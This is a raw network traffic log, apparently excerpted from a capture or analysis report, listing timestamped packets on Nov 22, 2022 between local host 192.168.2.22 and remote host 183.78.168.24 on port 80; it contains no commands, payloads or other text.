                                                                                Nov 22, 2022 05:10:20.162753105 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.162832975 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.162935019 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.163000107 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.163045883 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.163049936 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.163089991 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.163132906 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.163232088 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.163274050 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.163316965 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.163419008 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.163518906 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.163558960 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.163562059 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.307478905 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.307558060 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.307601929 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.307604074 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.307643890 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.307656050 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.307687044 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.307734966 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.307735920 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.307775974 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.307816029 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.307826042 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.307857990 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.307897091 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.307907104 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.307940006 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.307977915 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.307988882 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.308126926 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.308168888 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.308178902 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.308249950 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.308301926 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.308326960 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.308439970 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.308479071 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.308491945 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.308614969 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.308731079 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.308773994 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.308815002 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.308868885 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.308893919 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.308934927 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.308985949 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.309073925 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.309113979 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.309161901 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.309276104 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.309317112 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.309357882 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.309366941 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.309554100 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.309595108 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.309606075 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.309659958 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.309712887 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.309739113 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.309896946 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.309940100 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.309951067 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.310079098 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.310128927 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.310129881 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.311423063 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.315938950 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.315984964 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.316025972 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.316055059 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.316066980 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.316108942 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.316121101 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.316189051 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.316239119 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.316301107 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.316343069 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.316389084 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.316438913 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.316513062 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.316562891 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.316663027 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.316732883 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.316797972 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.316836119 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.316878080 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.316931963 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.316956997 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.317074060 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.317116976 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.317143917 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.317251921 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.317307949 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.317342043 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.317420959 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.317475080 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.317503929 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.317681074 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.317723036 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.317738056 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.317764044 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.317812920 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.462086916 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.462187052 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.462264061 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.462264061 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.462332964 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.462405920 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.462466002 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.462587118 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.462651968 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.462717056 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.462718010 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.462783098 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.462846994 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.462918043 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.462934017 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.463001013 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.463300943 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.465423107 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.465509892 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.465559006 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.465578079 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.465646029 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.465711117 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.465775013 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.465856075 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.465924978 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.465990067 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.466046095 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.466054916 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.466181040 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.466309071 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.466365099 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.466375113 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.466439009 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.466562986 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.466624975 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.466639042 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.466761112 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.466819048 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.466836929 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.466928959 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.466999054 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.467055082 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.467065096 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.467130899 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.467192888 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.467246056 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.467258930 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.467385054 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.467458963 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.467519045 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.467528105 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.469831944 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.469877958 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.469893932 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.469974041 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.470079899 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.470122099 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.470161915 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.470236063 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.470330954 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.470371962 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.470407963 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.470484018 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.470573902 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.470618963 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.470650911 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.470762968 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.470856905 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.470910072 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.470951080 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.471065044 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.471105099 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.471153975 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.471193075 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.471288919 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.471378088 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.471427917 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.471437931 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.471532106 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.471642971 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.471688986 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.471719027 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.471884012 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.472141027 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.617357969 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.617466927 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.617547035 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.617607117 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.617619038 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.617686987 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.617750883 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.617800951 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.617816925 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.617887020 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.617963076 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.618016005 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.618031979 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.618103027 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.618166924 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.618247986 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.619538069 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.619611979 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.619669914 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.619909048 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.619978905 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.620043039 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.620100021 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.620107889 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.620176077 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.620239019 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.620292902 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.620382071 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.620450974 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.620518923 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.620573997 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.620584011 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.620708942 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.620774984 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.620832920 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.621087074 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.621198893 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.621331930 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.621402025 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.621480942 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.621553898 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.621629000 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.621685982 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.621699095 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.621766090 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.621822119 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.622072935 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.622126102 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.622551918 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.623963118 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.624008894 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.624058008 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.624064922 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.624217987 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.624260902 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.624268055 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.624300957 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.624449015 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.624495029 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.624500990 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.624598026 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.624645948 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.624715090 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.624804020 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.624845028 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.624900103 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.624963045 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.625005007 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.625113010 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.625169992 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.625202894 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.625287056 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.625405073 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.625467062 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.625488997 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.625569105 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.625614882 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.625628948 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.625751972 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.625818968 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.625875950 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.625920057 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.625999928 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.626063108 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.626085997 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.772232056 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.772298098 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.772320032 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.772339106 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.772382975 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.772387981 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.772423029 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.772475958 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.772526026 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.772572041 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.772612095 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.772665977 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.772742987 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.772795916 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.772876024 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.772934914 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.772990942 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.774104118 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.774152994 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.774219036 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.774360895 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.774404049 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.774494886 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.774652004 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.774729013 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.774770021 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.774779081 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.775017977 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.775059938 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.775113106 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.775135040 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.775178909 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.775219917 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.775252104 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.775333881 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.775383949 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.775388956 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.775608063 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.775754929 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.775763035 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.775883913 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.775940895 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.775993109 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.776034117 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.776195049 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.776254892 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.776293039 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.776375055 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.776586056 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.776627064 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.776638031 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.777930975 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.777975082 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.778002024 CET4917880192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:20.778178930 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.778237104 CET8049178183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:20.778238058 CET4917880192.168.2.22183.78.168.24
